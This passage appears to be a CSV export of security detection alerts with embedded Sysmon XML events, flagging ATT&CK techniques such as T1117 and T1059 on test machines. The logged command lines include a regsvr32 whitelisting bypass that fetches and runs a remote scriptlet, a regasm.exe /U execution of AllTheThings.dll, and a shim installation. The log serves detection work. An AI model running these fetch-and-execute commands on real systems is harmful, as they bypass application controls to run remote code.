<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:45.332</Data>
<Data Name=""ProcessGuid"">747F3D96-6639-5D3F-0000-001074F48900</Data>
<Data Name=""ProcessId"">208</Data>
<Data Name=""Image"">C:\Windows\System32\calc.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Calculator</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\calc.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6638-5D3F-0000-001067BA8900</Data>
<Data Name=""ParentProcessId"">4288</Data>
<Data Name=""ParentImage"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""ParentCommandLine"">regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1564436024.81932,2019-07-30T01:33:44.819320+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:44.641177Z"">
</TimeCreated>
<EventRecordID>4931</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:44.622</Data>
<Data Name=""ProcessGuid"">747F3D96-6638-5D3F-0000-001067BA8900</Data>
<Data Name=""ProcessId"">4288</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6638-5D3F-0000-00103DA88900</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1564436024.81932,2019-07-30T01:33:44.819320+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:44.641177Z"">
</TimeCreated>
<EventRecordID>4931</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:44.622</Data>
<Data Name=""ProcessGuid"">747F3D96-6638-5D3F-0000-001067BA8900</Data>
<Data Name=""ProcessId"">4288</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6638-5D3F-0000-00103DA88900</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436024.81932,2019-07-30T01:33:44.819320+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:44.641177Z"">
</TimeCreated>
<EventRecordID>4931</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:44.622</Data>
<Data Name=""ProcessGuid"">747F3D96-6638-5D3F-0000-001067BA8900</Data>
<Data Name=""ProcessId"">4288</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6638-5D3F-0000-00103DA88900</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1557854258.250959,2019-05-14T21:17:38.250959+04:00,,Threat,Critical,"User (insecurebank\Administrator) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( alice.insecurebank.local and IP ( 10.59.4.20 ) to hostname ( DC1 ) , IP ( 10.59.4.11 ) and port ( 389 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-14T17:17:26.738627Z"">
</TimeCreated>
<EventRecordID>32009</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1580"" ThreadID=""3960"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>alice.insecurebank.local</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-14 17:17:24.660</Data>
<Data Name=""ProcessGuid"">ECAD0485-F2EC-5CDA-0000-0010F1631500</Data>
<Data Name=""ProcessId"">4092</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""User"">insecurebank\Administrator</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.59.4.20</Data>
<Data Name=""SourceHostname"">alice.insecurebank.local</Data>
<Data Name=""SourcePort"">49584</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">10.59.4.11</Data>
<Data Name=""DestinationHostname"">DC1</Data>
<Data Name=""DestinationPort"">389</Data>
<Data Name=""DestinationPortName"">ldap</Data>
</EventData>
</Event>",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1557854246.738627,2019-05-14T21:17:26.738627+04:00,,Threat,Critical,"User (insecurebank\Administrator) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( alice.insecurebank.local and IP ( 10.59.4.20 ) to hostname ( DC1 ) , IP ( 10.59.4.11 ) and port ( 389 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-14T17:17:26.440651Z"">
</TimeCreated>
<EventRecordID>32008</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1580"" ThreadID=""3960"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>alice.insecurebank.local</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-14 17:17:24.597</Data>
<Data Name=""ProcessGuid"">ECAD0485-F2EC-5CDA-0000-0010F1631500</Data>
<Data Name=""ProcessId"">4092</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""User"">insecurebank\Administrator</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.59.4.20</Data>
<Data Name=""SourceHostname"">alice.insecurebank.local</Data>
<Data Name=""SourcePort"">49583</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">10.59.4.11</Data>
<Data Name=""DestinationHostname"">DC1</Data>
<Data Name=""DestinationPort"">389</Data>
<Data Name=""DestinationPortName"">ldap</Data>
</EventData>
</Event>",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436024.287385,2019-07-30T01:33:44.287385+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:44.268287Z"">
</TimeCreated>
<EventRecordID>4929</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:44.204</Data>
<Data Name=""ProcessGuid"">747F3D96-6638-5D3F-0000-00103DA88900</Data>
<Data Name=""ProcessId"">1652</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436024.287385,2019-07-30T01:33:44.287385+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:44.268287Z"">
</TimeCreated>
<EventRecordID>4929</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:44.204</Data>
<Data Name=""ProcessGuid"">747F3D96-6638-5D3F-0000-00103DA88900</Data>
<Data Name=""ProcessId"">1652</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1587853142.072006,2020-04-26T02:19:02.072006+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-04-25T22:19:02.057201Z"">
</TimeCreated>
<EventRecordID>27334</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2752"" ThreadID=""3576"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-04-25 22:19:01.724</Data>
<Data Name=""ProcessGuid"">747F3D96-B755-5EA4-0000-0010D06E2500</Data>
<Data Name=""ProcessId"">4484</Data>
<Data Name=""Image"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Host Process for Windows Services</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">svchost.exe</Data>
<Data Name=""CommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-3384-5EA5-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69</Data>
<Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
<Data Name=""ParentProcessId"">596</Data>
<Data Name=""ParentImage"">?</Data>
<Data Name=""ParentCommandLine"">?</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553028513.459611,2019-03-20T00:48:33.459611+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T20:48:33.439582Z"">
</TimeCreated>
<EventRecordID>1966368</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 20:48:33.279</Data>
<Data Name=""ProcessGuid"">365ABB72-55A1-5C91-0000-0010AB8C0700</Data>
<Data Name=""ProcessId"">2112</Data>
<Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
<Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Compatibility Database Installer</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q &quot;C:\Windows\AppPatch\Test.SDB &quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\System32\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
<Data Name=""LogonId"">0x33435</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
<Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
<Data Name=""ParentProcessId"">2704</Data>
<Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436019.372599,2019-07-30T01:33:39.372599+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:39.358048Z"">
</TimeCreated>
<EventRecordID>4926</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:39.223</Data>
<Data Name=""ProcessGuid"">747F3D96-6633-5D3F-0000-001092628900</Data>
<Data Name=""ProcessId"">5056</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436019.358048,2019-07-30T01:33:39.358048+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
